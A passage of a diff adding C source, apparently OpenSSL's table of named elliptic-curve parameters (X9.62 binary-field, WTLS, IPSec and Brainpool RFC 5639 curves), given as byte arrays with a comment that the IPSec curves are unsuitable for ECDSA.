+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0B,
+        /* a */
+        0x00, 0x91, 0xA0, 0x91, 0xF0, 0x3B, 0x5F, 0xBA, 0x4A, 0xB2, 0xCC, 0xF4,
+        0x9C, 0x4E, 0xDD, 0x22, 0x0F, 0xB0, 0x28, 0x71, 0x2D, 0x42, 0xBE, 0x75,
+        0x2B, 0x2C, 0x40, 0x09, 0x4D, 0xBA, 0xCD, 0xB5, 0x86, 0xFB, 0x20,
+        /* b */
+        0x00, 0x71, 0x67, 0xEF, 0xC9, 0x2B, 0xB2, 0xE3, 0xCE, 0x7C, 0x8A, 0xAA,
+        0xFF, 0x34, 0xE1, 0x2A, 0x9C, 0x55, 0x70, 0x03, 0xD7, 0xC7, 0x3A, 0x6F,
+        0xAF, 0x00, 0x3F, 0x99, 0xF6, 0xCC, 0x84, 0x82, 0xE5, 0x40, 0xF7,
+        /* x */
+        0x00, 0x61, 0x08, 0xBA, 0xBB, 0x2C, 0xEE, 0xBC, 0xF7, 0x87, 0x05, 0x8A,
+        0x05, 0x6C, 0xBE, 0x0C, 0xFE, 0x62, 0x2D, 0x77, 0x23, 0xA2, 0x89, 0xE0,
+        0x8A, 0x07, 0xAE, 0x13, 0xEF, 0x0D, 0x10, 0xD1, 0x71, 0xDD, 0x8D,
+        /* y */
+        0x00, 0x10, 0xC7, 0x69, 0x57, 0x16, 0x85, 0x1E, 0xEF, 0x6B, 0xA7, 0xF6,
+        0x87, 0x2E, 0x61, 0x42, 0xFB, 0xD2, 0x41, 0xB8, 0x30, 0xFF, 0x5E, 0xFC,
+        0xAC, 0xEC, 0xCA, 0xB0, 0x5E, 0x02, 0x00, 0x5D, 0xDE, 0x9D, 0x23,
+        /* order */
+        0x00, 0x00, 0x01, 0x00, 0xFA, 0xF5, 0x13, 0x54, 0xE0, 0xE3, 0x9E, 0x48,
+        0x92, 0xDF, 0x6E, 0x31, 0x9C, 0x72, 0xC8, 0x16, 0x16, 0x03, 0xFA, 0x45,
+        0xAA, 0x7B, 0x99, 0x8A, 0x16, 0x7B, 0x8F, 0x1E, 0x62, 0x95, 0x21
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 39 * 6];
+} _EC_X9_62_CHAR2_304W1 = {
+    {
+        NID_X9_62_characteristic_two_field, 0, 39, 0xFE2E
+    },
+    {
+        /* no seed */
+        /* p */
+        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x08, 0x07,
+        /* a */
+        0x00, 0xFD, 0x0D, 0x69, 0x31, 0x49, 0xA1, 0x18, 0xF6, 0x51, 0xE6, 0xDC,
+        0xE6, 0x80, 0x20, 0x85, 0x37, 0x7E, 0x5F, 0x88, 0x2D, 0x1B, 0x51, 0x0B,
+        0x44, 0x16, 0x00, 0x74, 0xC1, 0x28, 0x80, 0x78, 0x36, 0x5A, 0x03, 0x96,
+        0xC8, 0xE6, 0x81,
+        /* b */
+        0x00, 0xBD, 0xDB, 0x97, 0xE5, 0x55, 0xA5, 0x0A, 0x90, 0x8E, 0x43, 0xB0,
+        0x1C, 0x79, 0x8E, 0xA5, 0xDA, 0xA6, 0x78, 0x8F, 0x1E, 0xA2, 0x79, 0x4E,
+        0xFC, 0xF5, 0x71, 0x66, 0xB8, 0xC1, 0x40, 0x39, 0x60, 0x1E, 0x55, 0x82,
+        0x73, 0x40, 0xBE,
+        /* x */
+        0x00, 0x19, 0x7B, 0x07, 0x84, 0x5E, 0x9B, 0xE2, 0xD9, 0x6A, 0xDB, 0x0F,
+        0x5F, 0x3C, 0x7F, 0x2C, 0xFF, 0xBD, 0x7A, 0x3E, 0xB8, 0xB6, 0xFE, 0xC3,
+        0x5C, 0x7F, 0xD6, 0x7F, 0x26, 0xDD, 0xF6, 0x28, 0x5A, 0x64, 0x4F, 0x74,
+        0x0A, 0x26, 0x14,
+        /* y */
+        0x00, 0xE1, 0x9F, 0xBE, 0xB7, 0x6E, 0x0D, 0xA1, 0x71, 0x51, 0x7E, 0xCF,
+        0x40, 0x1B, 0x50, 0x28, 0x9B, 0xF0, 0x14, 0x10, 0x32, 0x88, 0x52, 0x7A,
+        0x9B, 0x41, 0x6A, 0x10, 0x5E, 0x80, 0x26, 0x0B, 0x54, 0x9F, 0xDC, 0x1B,
+        0x92, 0xC0, 0x3B,
+        /* order */
+        0x00, 0x00, 0x01, 0x01, 0xD5, 0x56, 0x57, 0x2A, 0xAB, 0xAC, 0x80, 0x01,
+        0x01, 0xD5, 0x56, 0x57, 0x2A, 0xAB, 0xAC, 0x80, 0x01, 0x02, 0x2D, 0x5C,
+        0x91, 0xDD, 0x17, 0x3F, 0x8F, 0xB5, 0x61, 0xDA, 0x68, 0x99, 0x16, 0x44,
+        0x43, 0x05, 0x1D
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 45 * 6];
+} _EC_X9_62_CHAR2_359V1 = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 45, 0x4C
+    },
+    {
+        /* seed */
+        0x2B, 0x35, 0x49, 0x20, 0xB7, 0x24, 0xD6, 0x96, 0xE6, 0x76, 0x87, 0x56,
+        0x15, 0x17, 0x58, 0x5B, 0xA1, 0x33, 0x2D, 0xC6,
+        /* p */
+        0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* a */
+        0x56, 0x67, 0x67, 0x6A, 0x65, 0x4B, 0x20, 0x75, 0x4F, 0x35, 0x6E, 0xA9,
+        0x20, 0x17, 0xD9, 0x46, 0x56, 0x7C, 0x46, 0x67, 0x55, 0x56, 0xF1, 0x95,
+        0x56, 0xA0, 0x46, 0x16, 0xB5, 0x67, 0xD2, 0x23, 0xA5, 0xE0, 0x56, 0x56,
+        0xFB, 0x54, 0x90, 0x16, 0xA9, 0x66, 0x56, 0xA5, 0x57,
+        /* b */
+        0x24, 0x72, 0xE2, 0xD0, 0x19, 0x7C, 0x49, 0x36, 0x3F, 0x1F, 0xE7, 0xF5,
+        0xB6, 0xDB, 0x07, 0x5D, 0x52, 0xB6, 0x94, 0x7D, 0x13, 0x5D, 0x8C, 0xA4,
+        0x45, 0x80, 0x5D, 0x39, 0xBC, 0x34, 0x56, 0x26, 0x08, 0x96, 0x87, 0x74,
+        0x2B, 0x63, 0x29, 0xE7, 0x06, 0x80, 0x23, 0x19, 0x88,
+        /* x */
+        0x3C, 0x25, 0x8E, 0xF3, 0x04, 0x77, 0x67, 0xE7, 0xED, 0xE0, 0xF1, 0xFD,
+        0xAA, 0x79, 0xDA, 0xEE, 0x38, 0x41, 0x36, 0x6A, 0x13, 0x2E, 0x16, 0x3A,
+        0xCE, 0xD4, 0xED, 0x24, 0x01, 0xDF, 0x9C, 0x6B, 0xDC, 0xDE, 0x98, 0xE8,
+        0xE7, 0x07, 0xC0, 0x7A, 0x22, 0x39, 0xB1, 0xB0, 0x97,
+        /* y */
+        0x53, 0xD7, 0xE0, 0x85, 0x29, 0x54, 0x70, 0x48, 0x12, 0x1E, 0x9C, 0x95,
+        0xF3, 0x79, 0x1D, 0xD8, 0x04, 0x96, 0x39, 0x48, 0xF3, 0x4F, 0xAE, 0x7B,
+        0xF4, 0x4E, 0xA8, 0x23, 0x65, 0xDC, 0x78, 0x68, 0xFE, 0x57, 0xE4, 0xAE,
+        0x2D, 0xE2, 0x11, 0x30, 0x5A, 0x40, 0x71, 0x04, 0xBD,
+        /* order */
+        0x01, 0xAF, 0x28, 0x6B, 0xCA, 0x1A, 0xF2, 0x86, 0xBC, 0xA1, 0xAF, 0x28,
+        0x6B, 0xCA, 0x1A, 0xF2, 0x86, 0xBC, 0xA1, 0xAF, 0x28, 0x6B, 0xC9, 0xFB,
+        0x8F, 0x6B, 0x85, 0xC5, 0x56, 0x89, 0x2C, 0x20, 0xA7, 0xEB, 0x96, 0x4F,
+        0xE7, 0x71, 0x9E, 0x74, 0xF4, 0x90, 0x75, 0x8D, 0x3B
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 47 * 6];
+} _EC_X9_62_CHAR2_368W1 = {
+    {
+        NID_X9_62_characteristic_two_field, 0, 47, 0xFF70
+    },
+    {
+        /* no seed */
+        /* p */
+        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07,
+        /* a */
+        0x00, 0xE0, 0xD2, 0xEE, 0x25, 0x09, 0x52, 0x06, 0xF5, 0xE2, 0xA4, 0xF9,
+        0xED, 0x22, 0x9F, 0x1F, 0x25, 0x6E, 0x79, 0xA0, 0xE2, 0xB4, 0x55, 0x97,
+        0x0D, 0x8D, 0x0D, 0x86, 0x5B, 0xD9, 0x47, 0x78, 0xC5, 0x76, 0xD6, 0x2F,
+        0x0A, 0xB7, 0x51, 0x9C, 0xCD, 0x2A, 0x1A, 0x90, 0x6A, 0xE3, 0x0D,
+        /* b */
+        0x00, 0xFC, 0x12, 0x17, 0xD4, 0x32, 0x0A, 0x90, 0x45, 0x2C, 0x76, 0x0A,
+        0x58, 0xED, 0xCD, 0x30, 0xC8, 0xDD, 0x06, 0x9B, 0x3C, 0x34, 0x45, 0x38,
+        0x37, 0xA3, 0x4E, 0xD5, 0x0C, 0xB5, 0x49, 0x17, 0xE1, 0xC2, 0x11, 0x2D,
+        0x84, 0xD1, 0x64, 0xF4, 0x44, 0xF8, 0xF7, 0x47, 0x86, 0x04, 0x6A,
+        /* x */
+        0x00, 0x10, 0x85, 0xE2, 0x75, 0x53, 0x81, 0xDC, 0xCC, 0xE3, 0xC1, 0x55,
+        0x7A, 0xFA, 0x10, 0xC2, 0xF0, 0xC0, 0xC2, 0x82, 0x56, 0x46, 0xC5, 0xB3,
+        0x4A, 0x39, 0x4C, 0xBC, 0xFA, 0x8B, 0xC1, 0x6B, 0x22, 0xE7, 0xE7, 0x89,
+        0xE9, 0x27, 0xBE, 0x21, 0x6F, 0x02, 0xE1, 0xFB, 0x13, 0x6A, 0x5F,
+        /* y */
+        0x00, 0x7B, 0x3E, 0xB1, 0xBD, 0xDC, 0xBA, 0x62, 0xD5, 0xD8, 0xB2, 0x05,
+        0x9B, 0x52, 0x57, 0x97, 0xFC, 0x73, 0x82, 0x2C, 0x59, 0x05, 0x9C, 0x62,
+        0x3A, 0x45, 0xFF, 0x38, 0x43, 0xCE, 0xE8, 0xF8, 0x7C, 0xD1, 0x85, 0x5A,
+        0xDA, 0xA8, 0x1E, 0x2A, 0x07, 0x50, 0xB8, 0x0F, 0xDA, 0x23, 0x10,
+        /* order */
+        0x00, 0x00, 0x01, 0x00, 0x90, 0x51, 0x2D, 0xA9, 0xAF, 0x72, 0xB0, 0x83,
+        0x49, 0xD9, 0x8A, 0x5D, 0xD4, 0xC7, 0xB0, 0x53, 0x2E, 0xCA, 0x51, 0xCE,
+        0x03, 0xE2, 0xD1, 0x0F, 0x3B, 0x7A, 0xC5, 0x79, 0xBD, 0x87, 0xE9, 0x09,
+        0xAE, 0x40, 0xA6, 0xF1, 0x31, 0xE9, 0xCF, 0xCE, 0x5B, 0xD9, 0x67
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 54 * 6];
+} _EC_X9_62_CHAR2_431R1 = {
+    {
+        NID_X9_62_characteristic_two_field, 0, 54, 0x2760
+    },
+    {
+        /* no seed */
+        /* p */
+        0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* a */
+        0x1A, 0x82, 0x7E, 0xF0, 0x0D, 0xD6, 0xFC, 0x0E, 0x23, 0x4C, 0xAF, 0x04,
+        0x6C, 0x6A, 0x5D, 0x8A, 0x85, 0x39, 0x5B, 0x23, 0x6C, 0xC4, 0xAD, 0x2C,
+        0xF3, 0x2A, 0x0C, 0xAD, 0xBD, 0xC9, 0xDD, 0xF6, 0x20, 0xB0, 0xEB, 0x99,
+        0x06, 0xD0, 0x95, 0x7F, 0x6C, 0x6F, 0xEA, 0xCD, 0x61, 0x54, 0x68, 0xDF,
+        0x10, 0x4D, 0xE2, 0x96, 0xCD, 0x8F,
+        /* b */
+        0x10, 0xD9, 0xB4, 0xA3, 0xD9, 0x04, 0x7D, 0x8B, 0x15, 0x43, 0x59, 0xAB,
+        0xFB, 0x1B, 0x7F, 0x54, 0x85, 0xB0, 0x4C, 0xEB, 0x86, 0x82, 0x37, 0xDD,
+        0xC9, 0xDE, 0xDA, 0x98, 0x2A, 0x67, 0x9A, 0x5A, 0x91, 0x9B, 0x62, 0x6D,
+        0x4E, 0x50, 0xA8, 0xDD, 0x73, 0x1B, 0x10, 0x7A, 0x99, 0x62, 0x38, 0x1F,
+        0xB5, 0xD8, 0x07, 0xBF, 0x26, 0x18,
+        /* x */
+        0x12, 0x0F, 0xC0, 0x5D, 0x3C, 0x67, 0xA9, 0x9D, 0xE1, 0x61, 0xD2, 0xF4,
+        0x09, 0x26, 0x22, 0xFE, 0xCA, 0x70, 0x1B, 0xE4, 0xF5, 0x0F, 0x47, 0x58,
+        0x71, 0x4E, 0x8A, 0x87, 0xBB, 0xF2, 0xA6, 0x58, 0xEF, 0x8C, 0x21, 0xE7,
+        0xC5, 0xEF, 0xE9, 0x65, 0x36, 0x1F, 0x6C, 0x29, 0x99, 0xC0, 0xC2, 0x47,
+        0xB0, 0xDB, 0xD7, 0x0C, 0xE6, 0xB7,
+        /* y */
+        0x20, 0xD0, 0xAF, 0x89, 0x03, 0xA9, 0x6F, 0x8D, 0x5F, 0xA2, 0xC2, 0x55,
+        0x74, 0x5D, 0x3C, 0x45, 0x1B, 0x30, 0x2C, 0x93, 0x46, 0xD9, 0xB7, 0xE4,
+        0x85, 0xE7, 0xBC, 0xE4, 0x1F, 0x6B, 0x59, 0x1F, 0x3E, 0x8F, 0x6A, 0xDD,
+        0xCB, 0xB0, 0xBC, 0x4C, 0x2F, 0x94, 0x7A, 0x7D, 0xE1, 0xA8, 0x9B, 0x62,
+        0x5D, 0x6A, 0x59, 0x8B, 0x37, 0x60,
+        /* order */
+        0x00, 0x03, 0x40, 0x34, 0x03, 0x40, 0x34, 0x03, 0x40, 0x34, 0x03, 0x40,
+        0x34, 0x03, 0x40, 0x34, 0x03, 0x40, 0x34, 0x03, 0x40, 0x34, 0x03, 0x40,
+        0x34, 0x03, 0x40, 0x34, 0x03, 0x23, 0xC3, 0x13, 0xFA, 0xB5, 0x05, 0x89,
+        0x70, 0x3B, 0x5E, 0xC6, 0x8D, 0x35, 0x87, 0xFE, 0xC6, 0x0D, 0x16, 0x1C,
+        0xC1, 0x49, 0xC1, 0xAD, 0x4A, 0x91
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 15 * 6];
+} _EC_WTLS_1 = {
+    {
+        NID_X9_62_characteristic_two_field, 0, 15, 2
+    },
+    {
+        /* no seed */
+        /* p */
+        0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x02, 0x01,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x01,
+        /* b */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x01,
+        /* x */
+        0x01, 0x66, 0x79, 0x79, 0xA4, 0x0B, 0xA4, 0x97, 0xE5, 0xD5, 0xC2, 0x70,
+        0x78, 0x06, 0x17,
+        /* y */
+        0x00, 0xF4, 0x4B, 0x4A, 0xF1, 0xEC, 0xC2, 0x63, 0x0E, 0x08, 0x78, 0x5C,
+        0xEB, 0xCC, 0x15,
+        /* order */
+        0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFD, 0xBF, 0x91, 0xAF,
+        0x6D, 0xEA, 0x73
+    }
+};
+
+/* IPSec curves */
+/*
+ * NOTE: The of curves over a extension field of non prime degree is not
+ * recommended (Weil-descent). As the group order is not a prime this curve
+ * is not suitable for ECDSA.
+ */
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 20 * 6];
+} _EC_IPSEC_155_ID3 = {
+    {
+        NID_X9_62_characteristic_two_field, 0, 20, 3
+    },
+    {
+        /* no seed */
+        /* p */
+        0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        /* b */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x33, 0x8f,
+        /* x */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7b,
+        /* y */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0xc8,
+        /* order */
+        0x02, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xC7, 0xF3,
+        0xC7, 0x88, 0x1B, 0xD0, 0x86, 0x8F, 0xA8, 0x6C
+    }
+};
+
+/*
+ * NOTE: The of curves over a extension field of non prime degree is not
+ * recommended (Weil-descent). As the group order is not a prime this curve
+ * is not suitable for ECDSA.
+ */
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 24 * 6];
+} _EC_IPSEC_185_ID4 = {
+    {
+        NID_X9_62_characteristic_two_field, 0, 24, 2
+    },
+    {
+        /* no seed */
+        /* p */
+        0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        /* b */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1e, 0xe9,
+        /* x */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18,
+        /* y */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d,
+        /* order */
+        0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xED, 0xF9, 0x7C, 0x44, 0xDB, 0x9F, 0x24, 0x20, 0xBA, 0xFC, 0xA7, 0x5E
+    }
+};
+
+#endif
+
+/*
+ * These curves were added by Annie Yousar <a.yousar@informatik.hu-berlin.de>
+ * For the definition of RFC 5639 curves see
+ * http://www.ietf.org/rfc/rfc5639.txt These curves are generated verifiable
+ * at random, nevertheless the seed is omitted as parameter because the
+ * generation mechanism is different from those defined in ANSI X9.62.
+ */
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 20 * 6];
+} _EC_brainpoolP160r1 = {
+    {
+        NID_X9_62_prime_field, 0, 20, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0xE9, 0x5E, 0x4A, 0x5F, 0x73, 0x70, 0x59, 0xDC, 0x60, 0xDF, 0xC7, 0xAD,
+        0x95, 0xB3, 0xD8, 0x13, 0x95, 0x15, 0x62, 0x0F,
+        /* a */
+        0x34, 0x0E, 0x7B, 0xE2, 0xA2, 0x80, 0xEB, 0x74, 0xE2, 0xBE, 0x61, 0xBA,
+        0xDA, 0x74, 0x5D, 0x97, 0xE8, 0xF7, 0xC3, 0x00,
+        /* b */
+        0x1E, 0x58, 0x9A, 0x85, 0x95, 0x42, 0x34, 0x12, 0x13, 0x4F, 0xAA, 0x2D,
+        0xBD, 0xEC, 0x95, 0xC8, 0xD8, 0x67, 0x5E, 0x58,
+        /* x */
+        0xBE, 0xD5, 0xAF, 0x16, 0xEA, 0x3F, 0x6A, 0x4F, 0x62, 0x93, 0x8C, 0x46,
+        0x31, 0xEB, 0x5A, 0xF7, 0xBD, 0xBC, 0xDB, 0xC3,
+        /* y */
+        0x16, 0x67, 0xCB, 0x47, 0x7A, 0x1A, 0x8E, 0xC3, 0x38, 0xF9, 0x47, 0x41,
+        0x66, 0x9C, 0x97, 0x63, 0x16, 0xDA, 0x63, 0x21,
+        /* order */
+        0xE9, 0x5E, 0x4A, 0x5F, 0x73, 0x70, 0x59, 0xDC, 0x60, 0xDF, 0x59, 0x91,
+        0xD4, 0x50, 0x29, 0x40, 0x9E, 0x60, 0xFC, 0x09
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 20 * 6];
+} _EC_brainpoolP160t1 = {
+    {
+        NID_X9_62_prime_field, 0, 20, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0xE9, 0x5E, 0x4A, 0x5F, 0x73, 0x70, 0x59, 0xDC, 0x60, 0xDF, 0xC7, 0xAD,
+        0x95, 0xB3, 0xD8, 0x13, 0x95, 0x15, 0x62, 0x0F,
+        /* a */
+        0xE9, 0x5E, 0x4A, 0x5F, 0x73, 0x70, 0x59, 0xDC, 0x60, 0xDF, 0xC7, 0xAD,
+        0x95, 0xB3, 0xD8, 0x13, 0x95, 0x15, 0x62, 0x0C,
+        /* b */
+        0x7A, 0x55, 0x6B, 0x6D, 0xAE, 0x53, 0x5B, 0x7B, 0x51, 0xED, 0x2C, 0x4D,
+        0x7D, 0xAA, 0x7A, 0x0B, 0x5C, 0x55, 0xF3, 0x80,
+        /* x */
+        0xB1, 0x99, 0xB1, 0x3B, 0x9B, 0x34, 0xEF, 0xC1, 0x39, 0x7E, 0x64, 0xBA,
+        0xEB, 0x05, 0xAC, 0xC2, 0x65, 0xFF, 0x23, 0x78,
+        /* y */
+        0xAD, 0xD6, 0x71, 0x8B, 0x7C, 0x7C, 0x19, 0x61, 0xF0, 0x99, 0x1B, 0x84,
+        0x24, 0x43, 0x77, 0x21, 0x52, 0xC9, 0xE0, 0xAD,
+        /* order */
+        0xE9, 0x5E, 0x4A, 0x5F, 0x73, 0x70, 0x59, 0xDC, 0x60, 0xDF, 0x59, 0x91,
+        0xD4, 0x50, 0x29, 0x40, 0x9E, 0x60, 0xFC, 0x09
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 24 * 6];
+} _EC_brainpoolP192r1 = {
+    {
+        NID_X9_62_prime_field, 0, 24, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0xC3, 0x02, 0xF4, 0x1D, 0x93, 0x2A, 0x36, 0xCD, 0xA7, 0xA3, 0x46, 0x30,
+        0x93, 0xD1, 0x8D, 0xB7, 0x8F, 0xCE, 0x47, 0x6D, 0xE1, 0xA8, 0x62, 0x97,
+        /* a */
+        0x6A, 0x91, 0x17, 0x40, 0x76, 0xB1, 0xE0, 0xE1, 0x9C, 0x39, 0xC0, 0x31,
+        0xFE, 0x86, 0x85, 0xC1, 0xCA, 0xE0, 0x40, 0xE5, 0xC6, 0x9A, 0x28, 0xEF,
+        /* b */
+        0x46, 0x9A, 0x28, 0xEF, 0x7C, 0x28, 0xCC, 0xA3, 0xDC, 0x72, 0x1D, 0x04,
+        0x4F, 0x44, 0x96, 0xBC, 0xCA, 0x7E, 0xF4, 0x14, 0x6F, 0xBF, 0x25, 0xC9,
+        /* x */
+        0xC0, 0xA0, 0x64, 0x7E, 0xAA, 0xB6, 0xA4, 0x87, 0x53, 0xB0, 0x33, 0xC5,
+        0x6C, 0xB0, 0xF0, 0x90, 0x0A, 0x2F, 0x5C, 0x48, 0x53, 0x37, 0x5F, 0xD6,
+        /* y */
+        0x14, 0xB6, 0x90, 0x86, 0x6A, 0xBD, 0x5B, 0xB8, 0x8B, 0x5F, 0x48, 0x28,
+        0xC1, 0x49, 0x00, 0x02, 0xE6, 0x77, 0x3F, 0xA2, 0xFA, 0x29, 0x9B, 0x8F,
+        /* order */
+        0xC3, 0x02, 0xF4, 0x1D, 0x93, 0x2A, 0x36, 0xCD, 0xA7, 0xA3, 0x46, 0x2F,
+        0x9E, 0x9E, 0x91, 0x6B, 0x5B, 0xE8, 0xF1, 0x02, 0x9A, 0xC4, 0xAC, 0xC1
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 24 * 6];
+} _EC_brainpoolP192t1 = {
+    {
+        NID_X9_62_prime_field, 0, 24, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0xC3, 0x02, 0xF4, 0x1D, 0x93, 0x2A, 0x36, 0xCD, 0xA7, 0xA3, 0x46, 0x30,
+        0x93, 0xD1, 0x8D, 0xB7, 0x8F, 0xCE, 0x47, 0x6D, 0xE1, 0xA8, 0x62, 0x97,
+        /* a */
+        0xC3, 0x02, 0xF4, 0x1D, 0x93, 0x2A, 0x36, 0xCD, 0xA7, 0xA3, 0x46, 0x30,
+        0x93, 0xD1, 0x8D, 0xB7, 0x8F, 0xCE, 0x47, 0x6D, 0xE1, 0xA8, 0x62, 0x94,
+        /* b */
+        0x13, 0xD5, 0x6F, 0xFA, 0xEC, 0x78, 0x68, 0x1E, 0x68, 0xF9, 0xDE, 0xB4,
+        0x3B, 0x35, 0xBE, 0xC2, 0xFB, 0x68, 0x54, 0x2E, 0x27, 0x89, 0x7B, 0x79,
+        /* x */
+        0x3A, 0xE9, 0xE5, 0x8C, 0x82, 0xF6, 0x3C, 0x30, 0x28, 0x2E, 0x1F, 0xE7,
+        0xBB, 0xF4, 0x3F, 0xA7, 0x2C, 0x44, 0x6A, 0xF6, 0xF4, 0x61, 0x81, 0x29,
+        /* y */
+        0x09, 0x7E, 0x2C, 0x56, 0x67, 0xC2, 0x22, 0x3A, 0x90, 0x2A, 0xB5, 0xCA,
+        0x44, 0x9D, 0x00, 0x84, 0xB7, 0xE5, 0xB3, 0xDE, 0x7C, 0xCC, 0x01, 0xC9,
+        /* order */
+        0xC3, 0x02, 0xF4, 0x1D, 0x93, 0x2A, 0x36, 0xCD, 0xA7, 0xA3, 0x46, 0x2F,
+        0x9E, 0x9E, 0x91, 0x6B, 0x5B, 0xE8, 0xF1, 0x02, 0x9A, 0xC4, 0xAC, 0xC1
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 28 * 6];
+} _EC_brainpoolP224r1 = {
+    {
+        NID_X9_62_prime_field, 0, 28, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0xD7, 0xC1, 0x34, 0xAA, 0x26, 0x43, 0x66, 0x86, 0x2A, 0x18, 0x30, 0x25,
+        0x75, 0xD1, 0xD7, 0x87, 0xB0, 0x9F, 0x07, 0x57, 0x97, 0xDA, 0x89, 0xF5,
+        0x7E, 0xC8, 0xC0, 0xFF,
+        /* a */
+        0x68, 0xA5, 0xE6, 0x2C, 0xA9, 0xCE, 0x6C, 0x1C, 0x29, 0x98, 0x03, 0xA6,
